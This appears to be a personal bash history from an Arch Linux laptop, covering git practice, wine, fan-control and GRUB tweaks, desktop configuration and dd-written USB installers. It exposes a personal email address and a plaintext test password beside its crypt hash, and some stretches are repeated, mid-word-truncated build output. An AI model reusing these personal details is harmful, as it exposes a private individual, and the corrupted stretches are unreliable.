+vi phone.c +jvi phone_fmt.h +vi phone_fmt.h +la +ls +vi makefile +ls +ks +ls +ls +vi Makefile +ls +ls +ls +ls +ls +vi makefile +vi phone.c +vi phone_fmt.h +ls +k +ls +vi makefile +vi phone.c +vi phone_fmt.c +ls +vi phone_fmt.o +vi phone_fmt.h.gch +vi phone.c +vi phone_fmt.c +vi phone_fmt.h +k +ssh appel@hoare.cs.umsl.edu +k +ssh appel@hoare.cs.umsl.edu +k +ssh appel@hoare.cs.umsl.edu +mkdir newproj +git init +ls +ls +rmdir newproj +mkdir -p ~/projectname.git +git init --bare +exit +mkdir -p ~/git/project +git init +git add . +vi hello +git commit -m "First commit" -a +git commit -m "first commit" hello.c +git commit -m "first commit" hello +ls +git remote add origin glafkv@delmar.umsl.ued:project.git +git push origin master +git remote add origin glafkv@delmar.umsl.edu:project.git +git push origin master +cat ~/.ssh/id_rsa.pub | ssh glafkv@delmar.umsl.edu "mkdir -p ~/.ssh && \ cat >> ~/.ssh/authorized_keys" +exec ssh-agent bash +ssh-add +mkdir -p ~/projectname.git +git init --bare +mkdir -p ~/git/project +git ini +git init +git add file +ls +git add hello +ls +git commit -m "hello" -a +git remote add origin glafkv@delmar.umsl.edu:project.git +git push origin master +git status +mkdir whoa +vi whoa +git init +git add whoa +git commit -m "first commit" +git remote add origins-out.git +git push -u origin master +git remote add origins-out.git +git push -u origin master +k +ls +ls +ls +rm whoa +rmdir whoa +ls +ls +k +ls +ls +mkdir -p +mkdir -p ~/git/project +ls +ls +ls +ls +git init +ls +git add . +git commit -m "First commit" -a +vi hello +k +ls +git commit -m "added some stuff +" +git add . +git commit -m "added some stuff" -a +git remote add origin glafkv@delmar.umsl.edu:project.fit +git push origin master +git commit -m "add some stuff" +gi remote add origin git@github.com:glafkv/figure-this-out.git +git remote add origin git@github.com:glafkv/figure-this-out.git +remote push -u origin master +git push -u origin master +logout +exit +k +ls +mkdir practice +mkdir -p ~ /projectname.git +mkdir -p ~/projectname.git +git init --bare +ls +exit +k +ls +mkdir -p ~/git/project +git init +ls +git add . +git commit -m "first commit" -a +mkdir project +git init +ls +vi hello.txt +git add . +ls +git commit -m "this is my first commit" +git pull origin master +git remote add origin glafkv@delmar.umsl.edu:project.git +git push origin master +git init +git remote add origin glafkv@delmar.umsl.edu:project.git +git push origin master +ls +ls +git remote add origin glafkv@delmar.umsl.edu:projectname.git +git push origin master +ls +ls +git push origin master +logout +ls +ls +ls +wine UbisoftGameLauncher.exe +wine UbisoftGameLauncher64.exe +wine UplayService.exe +wine Uplay.exe +ls +man wine +wine Uplay.exe & +ps -ef | grep uplay +kill -9 3191 +ps -ef | grep uplay +ls +;s +ls +ls +ls +ls +wine start Uplay.exe +ls +wine Uninstall.exe +wine upc.exe +wine UplayService.exe +wine UbisoftGameLauncher64.exe +wine UbisoftGameLauncher.exe +ls +ls +ls +wine Uninstall.exe +ls +wine upc.exe +wine UbisoftGameLauncher.exe +ls +wine UplayWebCore.exe +wine UplayWebCore.exe UplayWebCore.exe --type=renderer --no-sandbox --disable-features=TouchpadAndWheelScrollLatching --service-pipe-token=88FED7C58312E6D9AF25C2F71DF80821 --lang=en-US --locales-dir-path=C:/Program Files (x86)/Ubisoft/Ubisoft Game Launcher/locales/1/ --log-file=C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher\debug.log --disable-spell-checking --enable-system-flash --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=88FED7C58312E6D9AF25C2F71DF80821 --renderer-client-id=4 --mojo-platform-channel-handle=1040 /prefetch:1 +UplayWebCore.exe --type=renderer --no-sandbox --disable-features=TouchpadAndWheelScrollLatching --service-pipe-token=88FED7C58312E6D9AF25C2F71DF80821 --lang=en-US --locales-dir-path=C:/Program Files (x86)/Ubisoft/Ubisoft Game Launcher/locales/1/ --log-file=C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher\debug.log --disable-spell-checking --enable-system-flash --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=88FED7C58312E6D9AF25C2F71DF80821 --renderer-client-id=4 --mojo-platform-channel-handle=1040 /prefetch:1 +UplayWebCore.exe --type=renderer --no-sandbox --disable-features=TouchpadAndWheelScrollLatching --service-pipe-token=88FED7C58312E6D9AF25C2F71DF80821 --lang=en-US --locales-dir-path=C:/Program Files (x86)/Ubisoft/Ubisoft Game Launcher/locales/1/ --log-file=C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher\debug.log --disable-spell-checking --enable-system-flash --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=88FED7C58312E6D9AF25C2F71DF80821 --renderer-client-id=4 --mojo-platform-channel-handle=1040 /prefetch:1 +ls +ls +ls +ls applications/ +;s +ls +ls +ls +ls +ls +wine Uplay.desktop +file U +file Uplay.desktop +ls +ls +cat user +file user +cat netctl-gui.conf +rm netctl-gui.conf +ls +wine Uplay.desktop +./Uplay.desktop +cat Uplay.desktop +ls +ps -elf | grep uplay +ps -elf | grep ubisoft +ps -elf | grep play +kill -9 2424 +ps -elf | grep play +kill -9 2484 +ps -elf | grep play +ps -elf | grep ubisoft +ps -elf | grep game +shutdown 0 +bluetoothctl +man test +info useradd +man useradd +man crypt +man usermod +man userdel +perl -e 'print crypt('alex123','ab') +perl -e 'print crypt('alex123','ab')' +perl -e 'print crypt("alex123","ab")' +useradd -p abmpmMZ1K/xOE alex +man useradd +useradd -p abmpmMZ1K/xOE alex +sudo useradd -p abmpmMZ1K/xOE alex +su alex +sudo userdel alex +su alex +vim proiect/ValidatePass.sh +su +ls +cat 1.dict +ls +vim ValidatePass.sh +man useradd +vim ValidatePass.sh +./ValidatePass.sh +vim ValidatePass.sh +./ValidatePass.sh +su alex +./ValidatePass.sh +./ValidatePass.sh +sudo ./ValidatePass.sh +vim ValidatePass.sh +su +sudo userdel alex +vim ValidatePass.sh +shutdown 0 +cat /etc/passwd +./ValidatePass.sh +su root +ls +vim ValidatePass.sh +shutdown 0 +vim .config/ranger/rifle.conf +ls /dev +ls /dev | grep sd +mount /dev/sdb1 /mnt +sudo mount /dev/sdb1 /mnt +ls +ls -l +cp ~/Downloads/Oferta\ angajare_BCR . +cp ~/Downloads/Oferta\ angajare_BCR.pdf . +sudo cp ~/Downloads/Oferta\ angajare_BCR.pdf . +ls +umount /mnt +sudo umount /mnt +ls /mnt +firefox HarigaPdf +firefox HarigaPdf.pdf +vim .config/ranger/rifle.conf +sudo pacman -Syu +shutdown 0 +shutdown 0 +ls +ls +ls +ls +ls +ls +ls +wine Uninstall.exe +ls +ls +ls Ubisoft/ +ls +ls +ls +ls +wine iexplore.exe +ls +ls +ls +rm -r Ubisoft/ +ls +ls +ls +ls -l .wine/ +ls -ld .wine/ +pacman -Ql thinkfan +pacman -S thinkfan +sudo pacman -S thinkfan +git clone +ls +makepkg -si +vim /etc/default/grub +vim usefulCmd +vim .bashrc +ls -a +vim .bash_profile +grep alias * +ls +vim .bashrc +cat archNotes.self +rm bash_prof.log +ls +touch test +vim .bashrc +man alias +alias rm=rm -i +man rm +alias rm='rm -i' +touch test1 +rm test +rm test1 +cat test +rm test +touch t +rm t +man grub-config +grub-mkconfig -o /boot/grub/grub.cfg +sudo grub-mkconfig -o /boot/grub/grub.cfg +man pacman +pacman -Ql thinkfan +vim /usr/lib/modprobe.d/thinkpad_acpi.conf +su +thinkfan_acpi +sudo pacman -Ql thinkfan_acpi +sudo pacman -S thinkfan_acpi +sudo pacman -Ql thinkfan +su +vim /etc/default/thinkfan +cat /etc/default/thinkfan +systemctl enable thinkfan +systemctl enable thinkfan +vim /usr/share/doc/thinkfan/examples/thinkfan.conf.simple +sudo thinkfan -n +cat /usr/share/doc/thinkfan/examples/thinkfan.conf.simple > /etc/thinkfan.conf +sudo cat /usr/share/doc/thinkfan/examples/thinkfan.conf.simple > /etc/thinkfan.conf +su +systemctl enable thinkfan.service +systemctl start thinkfan.service +su +cat /proc/acpi/ibm/fan +su +cat /proc/acpi/ibm/fan +sudo echo level 7 /proc/acpi/ibm/fan +su +cat /usr/lib/modprobe.d/thinkpad_acpi.conf +lsmod +lsmod | think +lsmod | grep think +cat /etc/default/thinkfan +systemctl enable thinkfan +su +reboot +su +vim /etc/default/grub +reboot +ls /proc/acpi/ +vim /etc/default/grub +grub-mkconfig -o /boot/grub/grub.cfg +sudo grub-mkconfig -o /boot/grub/grub.cfg +reboot +ls /proc/acpi/ +vim /etc/default/grub +sudo grub-mkconfig -o /boot/grub/grub.cfg +reboot +reboot +journalctl +vim /etc/default/grub +sudo grub-mkconfig -o /boot/grub/grub.cfg +reboot +reboot +reboot +systemctl disable thinkfan.service +reboot +vim /etc/default/grub +sudo grub-mkconfig -o /boot/grub/grub.cfg +su +cat /usr/lib/modprobe.d/thinkpad_acpi.conf +su +ls +cat /proc/acpi/ibm/fan +sensors +sensors +cat /sys/devices/platform/thinkpad_acpi/ +cat /sys/devices/platform/thinkpad_acpi/input/ +cat /sys/devices/platform/thinkpad_acpi/cmos_command +sudo cat /sys/devices/platform/thinkpad_acpi/cmos_command +ls /proc/acpi/ +ls +cat /proc/acpi/ibm/fan +pwmconfig +sudo pwmconfig +cat /usr/bin/fancontrol +vim /usr/bin/fancontrol +fancontrol +/usr/bin/fancontrol +ls /sys/class/hwmon/hwmon3/device/ +ls /sys/class/hwmon/hwmon3/device/hwmon/hwmon3/pwm1 +cat /sys/class/hwmon/hwmon0/device/temp +cat /sys/class/hwmon/hwmon3/fan1_input +readlink -f /sys/class/hwmon/[your-hwmon-device]/device | sed -e 's/^\/sys\///' +readlink -f /sys/class/hwmon/hwmon3/device | sed -e 's/^\/sys\///' +cat /sys/class/hwmon/hwmon3/device/hwmon/hwmon3/fan1_input +cat /sys/class/hwmon/hwmon3/device/hwmon/hwmon3/pwm1 +ls /sys/class/hwmon/hwmon3/device/hwmon/hwmon3/ +ls /sys/class/hwmon/hwmon0/device/ +ls /sys/class/hwmon/hwmon0/device/ +ls /sys/class/hwmon/hwmon0/device/temp +cat /sys/class/hwmon/hwmon0/device/temp +ls /sys/class/hwmon/hwmon3/device/hwmon/hwmon3/fan1_input +cat /sys/class/hwmon/hwmon3/device/hwmon/hwmon3/fan1_input +cat /sys/class/hwmon/hwmon3/device/hwmon/hwmon3/name +sed -e 's/[[:space:]=]/_/g' /sys/class/hwmon/hwmon3/name +cat /proc/acpi/ibm/fan +echo full-speed > /proc/acpi/ibm/fan +sudo echo full-speed > /proc/acpi/ibm/fan +su +vim /etc/fancontrol +cat /etc/fancontrol +cat /etc/fancontrol > fancontrol_config.backup +fancontrol +vim /etc/fancontrol +sudo vim /etc/fancontrol +fancontrol +sudo vim /etc/fancontrol +fancontrol +sudo vim /etc/fancontrol +fancontrol +sudo vim /etc/fancontrol +fancontrol +sensors +sensors +pwmconfig +sudo pwmconfig +readlink -f /sys/class/hwmon/[your-hwmon-device]/device | sed -e 's/^\/sys\///' +readlink -f /sys/class/hwmon/hwmon3/device/ | sed -e 's/^\/sys\///' +sed -e 's/[[:space:]=]/_/g' /sys/class/hwmon/hwmon3/device/name +sed -e 's/[[:space:]=]/_/g' /sys/class/hwmon/hwmon3/device/name +sudo sed -e 's/[[:space:]=]/_/g' /sys/class/hwmon/hwmon3/device/name +su +reboot +shutdown 0 +shutdown 0 +sudo wifi-menu +man netctl-auto +netctl-auto list +sudo netctl-auto list +sudo netctl-auto disable-all +sudo netctl-auto list +sudo netctl-auto -all +sudo netctl-auto enable-all +sudo netctl-auto switch-to 'wlp3s0-Dorin’s iPhone' +sudo netctl-auto list +sudo netctl-auto switch-to wlp3s0-WiFiMotoc +sudo netctl-auto switch-to 'wlp3s0-Dorin’s iPhone' +sudo netctl-auto switch-to wlp3s0-WiFiMotoc +pacman -Ss bittorent +pacman -Ss bittorrent +sudo pacman -S rtorrent +rtorrent +ping google.com +sudo netctl-auto switch-to 'wlp3s0-Dorin’s iPhone' +sudo netctl-auto switch-to wlp3s0-WiFiMotoc +sudo netctl-auto switch-to 'wlp3s0-Dorin’s iPhone' +shutdown 0 +git clone +makepkg -si +ls +sudo pacman -S transmission-qt +transmission-qt +bluetoothctl +sudo netctl-auto list +sudo netctl-auto switch-to 'wlp3s0-Dorin’s iPhone' +ping www.google.com +netctl-auto list +sudo netctl-auto list +netctl-auto switch-to wlp3s0-WiFiMotoc +sudo netctl-auto switch-to wlp3s0-WiFiMotoc +sudo netctl-auto switch-to 'wlp3s0-Dorin’s iPhone' +shutdown 0 +man systemctl +systemctl stop netctl-auto +systemctl stop netctl-auto +sudo wifi-menu +sudo wifi-menu +systemctl disable netctl-auto +netctl-auto store +netctl store +sudo netctl store +shutdown 0 +systemd-analyze +shutdown 0 +shtudown 0 +shutdown 0 +sudo pacman -Syu +libinput-gestures +libinput-gestures-setup stop +libinput-gestures-setup start +libinput-gestures-setup status +pacman -Ss vscode +pacman -Ss visual studio +sudo pacman -S code +vim /etc/libinput-gestures.conf +reboot +lsblk +ls +mkdir Code +mkdir Code/Proj1 +ls +mv Untitled-1 test.c +pacman -Ss xamp +vim /usr/share/dbus-1/services/ +ls /usr/share/dbus-1/services/ +shutdown 0 +sudo pacman -S libnotify +notify-send 'Hello World !' +notify-send 'Hello world!' 'This is an example notification.' --icon=dialog-information +sudo pacman -S notification-daemon +sudo wifi-menu +netctl store +sudo netctl store +netctl list +ls +vim x +vim .bashrc +vim .bashrc +vim .config/termite/config +cat .config/termite/config > .config/termite/config.old +vim .config/termite/config +tlp +tlp start +sudo tlp start +colorz Downloads/wallpapers/sea.jpg +colorz Downloads/wallpapers/sea.jpg +man colorz +colorz --help +echo $BROWSER +vim .config/termite/config +bumblebee +bumblebee-bugreport +sudo bumblebee-bugreport +rm bumblebee-bugreport-20190713_133718.tar.gz +id $USER +optirun glxgears -info +systemctl start bumblebeed +systemctl start bumblebeed +optirun glxgears -info +systemctl enable bumblebeed +systemctl enable bumblebeed.service +sudo pacman -S bbswitch +vim /etc/modules-load.d/ +vim /etc/modprobe.d/bbswitch.conf +bbswitch +bbswitchd +systemctl start bbswitch +colorz Downloads/wallpapers/sea.jpg +colorz Downloads/wallpapers/sea.jpg +vim .config/termite/config +\ +colorz Downloads/wallpapers/sea.jpg +vim .bashrc +vim .bashrc +shutdown 0 +ls +vim .bashrc +vim .config/i3/config +export PS1="\[\033[38;5;21m\]\u\[$(tput sgr0)\]\[\033[38;5;172m\]@\[$(tput sgr0)\]\[\033[38;5;34m\]\h\[$(tput sgr0)\]\[\033[38;5;15m\] \[$(tput sgr0)\]\[\033[38;5;130m\]\w\[$(tput sgr0)\]\[\033[38;5;15m\] \[$(tput sgr0)\]\[\033[38;5;25m\]\\$\[$(tput sgr0)\]\[\033[38;5;15m\] \[$(tput sgr0)\]"export PS1="\[\033[38;5;21m\]\u\[$(tput sgr0)\]\[\033[38;5;172m\]@\[$(tput sgr0)\]\[\033[38;5;34m\]\h\[$(tput sgr0)\]\[\033[38;5;15m\] \[$(tput sgr0)\]\[\033[38;5;130m\]\w\[$(tput sgr0)\]\[\033[38;5;15m\] \[$(tput sgr0)\]\[\033[38;5;25m\]\\$\[$(tput sgr0)\]\[\033[38;5;15m\] \ +vim .config/termite/config +vim .config/termite/config +ls +vim .bashrc +ls +vim .config/termite/config +vim .config/termite/config.old +vim .config/termite/config.old +;s +ls +vim .config/termite/config.old +vim .config/termite/config.old +ls +ls +vim .config/termite/config.old +vim .config/termite/config.old +vim .config/termite/config.old +vim .config/termite/config.old +vim .bashrc +vim .bashrc +vim .bashrc +vim .bashrc +vim .bashrc +ls +ls +ls +ls +ls +ls +vim .bashrc +vim .bashrc +vim .bashrc +vim .bashrc +bluetoothctl +ls +git clone +ls +makepkg -si +find powerline +find / -name powerline +tldr find +man find +find / -name powerline +find / -name powerline 2>/dev/null +ls +vim .bashrc +vim .bashrc +vim .bashrc +ls +vim .bashrc +ls +vim .bashrc +ls +ls +l +l +ls +ls +ls +vim .config/termite/config +vim .config/termite/config +vim Downloads/random.txt +vim Downloads/random.txt +ls Downloads/random* +rm random.txt +vim random\(1\).txt +vim -p random\(1\).txt ../.config/termite/config +vim -p random\(1\).txt ../.config/termite/config +vim -p random\(1\).txt ../.config/termite/confi ../.config/termite/config.old +vim termite/config +vim termite/config +vim termite/config +cat termite/config.old > termite/config +vim termite/config +ls +ls +vim config +cat config > config.old +vim config +vim -p config config.old +vim -p config config.old +vim .config/termite/config +ls +ls +ls +mkdir backup.git +git init +ls +ls -a +la -lha +s -lha +ls -lha +git add ../.config/ +git add ../.config/* +git branch branch_name +git init +git add .config/ +ls +rm bumblebee-bugreport-20190713_133718.tar.gz +ls +ls -la +vim .hushlogin +vim .nv +ls +ls +git add Downloads/wallpapers/ +git add archNotes.self +git add usefulCmd +git add .bashrc +git add .bash_history +git add .bash_profile +git add /etc/libinput-gestures.conf +cp /etc/libinput-gestures.conf . +ls +vim libinput-gestures.conf +git add libinput-gestures.conf +ls +rm -r Uplay/ +rm -r Music/ +ls +ls +mv proiect/ ValidatePass +ls +rm Desktop/Uplay.desktop +rm -r Desktop/ +cat test.sh +rm test.sh +ip addr +ip link +ip link show +git commit -m '13/7/2019: First backup' +git config --global user.email "heroidorin@gmail.com" +git config --global user.name "awfulwaffle77" +git commit -m '13/7/2019: First backup' +git push +git push -u origin master +git remote -v +git remote add origins.git +git push -u origin master +git push -u origin master +ls +shutdown 0 +vim .config/polybar/config +pkill polybar +./.config/polybar/launch.sh +vim .config/polybar/config +pkill polybar +./.config/polybar/launch.sh +vim .config/polybar/config + +vim .config/polybar/config +pkill polybar +./.config/polybar/launch.sh +vim .config/polybar/config +pkill polybar +./.config/polybar/launch.sh +vim .config/polybar/config +pkill polybar +./.config/polybar/launch.sh +vim .config/polybar/config +shutdown 0 +vim .config/termite/config +• +pkill polybar +.config/polybar/launch.sh +vim .config/polybar/config +pkill polybar +.config/polybar/launch.sh +vim .config/polybar/config +pkill polybar +.config/polybar/launch.sh +vim .config/polybar/config +pkill polybar +.config/polybar/launch.sh +vim .config/polybar/config +pkill polybar +.config/polybar/launch.sh +pacman -Ss fselect +vim .config/polybar/config +pkill polybar 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Service] +Name=org.freedesktop.Notifications +Exec=/usr/lib/notification-daemon-1.0/notification-daemon[D-BUS Service] +Name=org.freedesktop.Notifications +notify-send "hello" +notify-send "hello" +notify-send "hello" +notify-send "hello" +[D-BUS Service] +Name=org.freedesktop.Notifications +notify-send "hello" +notify-send "hello" +notify-send "hello" +notify-send "hello" +notify-send "hello" +notify-send "hello" +notify-send "hello" +notify-send "hello" +notify-send "hello" +notify-send "hello" +notify-send "hello" +notify-send "hello" +notify-send "hello" +notify-send "hello" +notify-send "hello" +notify-send "hello" +notify-send "hello" +notify-send "hello" +notify-send "hello" +notify-send "hello" +dunst +dunst +dunst +dunst +dunst +dunst +dunst +dunst +dunst +dunst +dunst +dunst +dunst +dunst +dunst +dunst +dunst +dunst +dunst +dunst +dunst +dunst +dunst\ +dunst\ +dunst +dunst +dunst +dunst +dunst +dunst +fc-list +dunst +dunst +echo $XDG_DATA_HOME +pacman -Qs notification +vim /usr/share/dbus-1/services/org.freedesktop.Notifications.service +cat /usr/share/dbus-1/services/org.freedesktop.Notifications.service +sudo pacman -S dunst +/usr/bin/dunst +cp /usr/share/dunst/dunstrc .config/dunst/dunstrc +mkdir .config/dunst +cp /usr/share/dunst/dunstrc .config/dunst/dunstrc +dunst +vim .config/dunst/dunstrc +vim .config/dunst/dunstrc +dunst +vim .config/i3/config +ls +git push +git commit -m "Added dunst" +ls -a +ls .git +notify-send "hello" +notify-send "hello" +notify-send "hello" +notify-send "hello" +notify-send "hello" +notify-send "hello" +notify-send "hello" +notify-send "hello" +notify-send "hello" +notify-send "hello" +notify-send "hello" +notify-send "hello" +notify-send "hello" +notify-send "hello" +notify-send "hell1" +notify-send "hell2" +notify-send "hello3" +notify-send "hello4" +notify-send "hello5" +notify-send "hello5" +notify-send "hello5" +notify-send "hello4" +notify-send "hello3" +sudo pacman -Syu +libinput-gestures-setup stop +libinput-gestures-setup stoplibinput-gestures-setup stoplibinput-gestures-setup stoplibinput-gestures-setup stoplibinput-gestures-setup stoplibinput-gestures-setup stopating gzip-compressed initcpio image: /boot/initramfs-linux.img +==> Image generation successful +==> Building image from preset: /etc/mkinitcpio.d/linux.preset: 'fallback' + -> -k /boot/vmlinuz-linux -c /etc/mkinitcpio.conf -g /boot/initramfs-linux-fallback.img -S autodetect +==> Starting build: 5.2.1-arch1-1-ARCH + -> Running build hook: [base] + -> Running build hook: [systemd] + -> Running build hook: [modconf] + -> Running build hook: [block] +==> WARNING: Possibly missing firmware for module: wd719x +==> WARNING: Possibly missing firmwareating gzip-compressed initcpio image: /boot/initramfs-linux.img +==> Image generation successful +==> Building image from preset: /etc/mkinitcpio.d/linux.preset: 'fallback' + -> -k /boot/vmlinuz-linux -c /etc/mkinitcpio.conf -g /boot/initramfs-linux-fallback.img -S autodetect +==> Starting build: 5.2.1-arch1-1-ARCH + -> Running build hook: [base] + -> Running build hook: [systemd] + -> Running build hook: [modconf] + -> Running build hook: [block] +==> WARNING: Possibly missing firmware for module: wd719x +==> WARNING: Possibly missing firmwareating gzip-compressed initcpio image: /boot/initramfs-linux.img +==> Image generation successful +==> Building image from preset: /etc/mkinitcpio.d/linux.preset: 'fallback' + -> -k /boot/vmlinuz-linux -c /etc/mkinitcpio.conf -g /boot/initramfs-linux-fallback.img -S autodetect +==> Starting build: 5.2.1-arch1-1-ARCH + -> Running build hook: [base] + -> Running build hook: [systemd] + -> Running build hook: [modconf] + -> Running build hook: [block] +==> WARNING: Possibly missing firmware for module: wd719x +==> WARNING: Possibly missing firmwareating gzip-compressed initcpio image: /boot/initramfs-linux.img +==> Image generation successful +==> Building image from preset: /etc/mkinitcpio.d/linux.preset: 'fallback' + -> -k /boot/vmlinuz-linux -c /etc/mkinitcpio.conf -g /boot/initramfs-linux-fallback.img -S autodetect +==> Starting build: 5.2.1-arch1-1-ARCH + -> Running build hook: [base] + -> Running build hook: [systemd] + -> Running build hook: [modconf] + -> Running build hook: [block] +==> WARNING: Possibly missing firmware for module: wd719x +==> WARNING: Possibly missing firmwareating gzip-compressed initcpio image: /boot/initramfs-linux.img +==> Image generation successful +==> Building image from preset: /etc/mkinitcpio.d/linux.preset: 'fallback' + -> -k /boot/vmlinuz-linux -c /etc/mkinitcpio.conf -g /boot/initramfs-linux-fallback.img -S autodetect +==> Starting build: 5.2.1-arch1-1-ARCH + -> Running build hook: [base] + -> Running build hook: [systemd] + -> Running build hook: [modconf] + -> Running build hook: [block] +==> WARNING: Possibly missing firmware for module: wd719x +ating gzip-compressed initcpio image: /boot/initramfs-linux.img +==> Image generation successful +==> Building image from preset: /etc/mkinitcpio.d/linux.preset: 'fallback' + -> -k /boot/vmlinuz-linux -c /etc/mkinitcpio.conf -g /boot/initramfs-linux-fallback.img -S autodetect +==> Starting build: 5.2.1-arch1-1-ARCH + -> Running build hook: [base] + -> Running build hook: [systemd] + -> Running build hook: [modconf] + -> Running build hook: [block] +==> WARNING: Possibly missing firmware for module: wd719x +==> WARNING: Possibly missing firmwareating gzip-compressed initcpio image: /boot/initramfs-linux.img +==> Image generation successful +==> Building image from preset: /etc/mkinitcpio.d/linux.preset: 'fallback' + -> -k /boot/vmlinuz-linux -c /etc/mkinitcpio.conf -g /boot/initramfs-linux-fallback.img -S autodetect +==> Starting build: 5.2.1-arch1-1-ARCH + -> Running build hook: [base] + -> Running build hook: [systemd] + -> Running build hook: [modconf] + -> Running build hook: [block] +==> WARNING: Possibly missing firmware for module: wd719x +==> WARNING: Possibly missing firmwareating gzip-compressed initcpio image: /boot/initramfs-linux.img +==> Image generation successful +==> Building image from preset: /etc/mkinitcpio.d/linux.preset: 'fallback' + -> -k /boot/vmlinuz-linux -c /etc/mkinitcpio.conf -g /boot/initramfs-linux-fallback.img -S autodetect +==> Starting build: 5.2.1-arch1-1-ARCH + -> Running build hook: [base] + -> Running build hook: [systemd] + -> Running build hook: [modconf] + -> Running build hook: [block] +==> WARNING: Possibly missing firmware for module: wd719x +==> WARNING: Possibly missin +libinput-list-devices +libinput-list +libinputlist +libinput list +libinput --help +libinput list-devices +showket +showke +showkey +sudo showkey +git add +git add .config/dunst/dunstrc +git add .config/dunst/ +git add .config/ +git commit -m "Added dunst" +git push +xinput +xinput list-props 13 +sudo show key +sudo showkey +sudo showkey +show keyshow keyshow keyshow keyshow keyshow keyshow keyshow keyshow keyshow keyshow keyshow keyshow keyshow keyshow key +pacman -Qs xclip +sudo pacman -S xclip +man xclip +sudo pacman -Rsu xclip +sudo pacman -S xclipboard +sudo pacman -S xorg-xclipboard +xorg-xclipboard +xclipboard +libinput-gestures-setup stoplibinput-gestures-setup stopshow key +sudo pacman -Rsu xorg-xclipboard +notify-send "hello" +libinput list-devices +libinput-gestures-setup stop +libinput-gestures-setup start +man xdotool +ls +vim /etc/libinput-gestures.conf +libinput-gestures-setup stop +libinput-gestures-setup start +vim /etc/libinput-gestures.conf +man patch +libinput-gestures-setup stop +libinput-gestures-setup start +libinput-gestures-setup stop +libinput-gestures-setup stop +libinput-gestures-setup start +libinput-gestures-setup stop +libinput-gestures-setup start +libinput-gestures-setup stop +libinput-gestures-setup start +libinput-gestures-setup stop +libinput-gestures-setup start +libinput-gestures-setup stop +libinput-gestures-setup start +libinput list +libinput --help +libinput list-devices +xinput +xinput +man xinput +xinput --list-prop 13 +xinput --list-props 13 +magikarp@awfulwaffle ~ $ +magikarp@awfulwaffle ~ $ +magikarp@awfulwaffle ~ $ +magikarp@awfulwaffle ~ $ +magikarp@awfulwaffle ~ $ +magikarp@awfulwaffle ~ $ +magikarp@awfulwaffle ~ $ +magikarp@awfulwaffle ~ $ +magikarp@awfulwaffle ~ $ +magikarp@awfulwaffle ~ $ +magikarp@awfulwaffle ~ $ +magikarp@awfulwaffle ~ $ +magikarp@awfulwaffle ~ $ +magikarp@awfulwaffle ~ $ +magikarp@awfulwaffle ~ $ +magikarp@awfulwaffle ~ $ +magikarp@awfulwaffle ~ $ +magikarp@awfulwaffle ~ $ +xinput --list-prop 13 +xinput --list-props 13 +git clone +makepkg -si +weather +/usr/bin/weather-report +man weather-report +weather-report --help +weather-report Bucharest +weather-report Paris +vim /usr/share/weather-util/places +cat /usr/share/weather-util/places | less +cat /usr/share/weather-util/places | grep Bucharest +cat /usr/share/weather-util/places | grep Romania +cat /usr/share/weather-util/places | less +shutdown 0 +ls +ls -l +ls -lah +pgrep -l '^dd$" +pgrep -l '^dd$' +kill -USR1 1467 +sudo kill -USR1 1467 +ls -l Downloads/Win10_1809Oct_v2_English_x64.iso +ls -jl Downloads/Win10_1809Oct_v2_English_x64.iso +ls -hl Downloads/Win10_1809Oct_v2_English_x64.iso +sudo kill -USR1 1467 +sudo kill -USR1 1467 +cat /dev +ls /dev +ls /dev | grep sd* +ls /dev | grep sd +ls /dev | grep sd +ls /dev | grep sd +mount /dev/sdb1 /mnt +sudo mount /dev/sdb1 /mnt +ls +ls - +ls _ +ls +ls +cp _ ~/usbcpy +cp -r _ ~/usbcpy +ls +cat WARNING\: +ls -lh +rm Image +rm Image +rm WARNING\: +rm -k +rm '-k' +rm "-k" +ls usbcpy/ +ls +ls +ls /dev/sdb* +man dd +dd if=Downloads/Win10_1809Oct_v2_English_x64.iso of=/dev/sdb1 +sudo dd if=Downloads/Win10_1809Oct_v2_English_x64.iso of=/dev/sdb1 +ls /dev/sd* +ls /dev/sdb* +mount /dev/sdb1 /mnt +sudo mount /dev/sdb1 /mnt +ls /mnt +reboot +ls /dev +ls /dev/sdb* +umount /mnt +ls /mnt +sudo dd if=Downloads/Win10_1809Oct_v2_English_x64.iso of=/dev/sdb1 status=progress +ps dd +pgrep dd +pgrep "^dd$" +pkill 1003 +pgrep "^dd$" +sudo dd if=Downloads/Win10_1809Oct_v2_English_x64.iso of=/dev/sdb1 status=progress bs=4M +reboot +sudo mount /dev/sdb1 /mnt +ls /mnt +pacman -Qs ntfs +reboot +shutdown 0 +netctl list +sudo wifi-menu +netctl list +rfkill +sudo wifi-menu +shutdown 0 +sudo pacman -Syu +sudo pacman -S parted +ls /mnt +ls -l +ls -l /mnt +cat /dev | grep sd +ls /dev | grep sd +ls /dev | grep sd1 +ls /dev | grep sd1 +ls /dev | grep sd1 +ls /dev | grep sd +mount /dev/sdb1 /mnt +sudo mount /dev/sdb1 /mnt +sudo mount /dev/sdb5 /mnt +ls +ls +bluetoothctl +cp Diverse/SchoolRelated.backup/SchoolRelated.backup.zip /mnt +lsblk +parted /dev/sda2 +sudo parted /dev/sda2 +ls +vim /etc/default/ +vim /etc/default/grub +grub-mkconfig -o /boot/grub/grub.cfg +sudo grub-mkconfig -o /boot/grub/grub.cfg +ls /dev | grep sd +sudo mount /dev/sdc1 /media +mkdir media +sudo mount /dev/sdc1 media +ls media +umount media +sudo umount media +history | grep dd +sudo dd if=Downloads/gparted-live-1.0.0-3-i686.iso of=/dev/sdc1 bs=4M +sudo dd if=Downloads/gparted-live-1.0.0-3-i686.iso of=/dev/sdc1 bs=4M status=progress +mount /dev/sdc1 media +sudo mount /dev/sdc1 media +ls media/ +ls /mnst +ls /mnt +ls -l /mnt +umount /mnt +sudo umount /mnt +ls /mnt +sudo mount /dev/sdb5 /mnt +ls -l /mnt +sudo umount /mnt +umount media +sudo umount media +sudo mount /dev/sdb1 /mnt +ls /mnt +umount /mnt +sudo umount /mnt +lsblk +vim .config/termite/config +cp Diverse/E/E.zip /mnt +bluetoothctl +ls -la +git add .sysScripts/ +git add .vimrc +cat .xbindkeysrc +git add .xbindkeysrc +ls -la +git add .xinitrc +git push +git commit -a "Updated some files" +git commit -m "Updated some files" +git push +pacman -Q +pacman 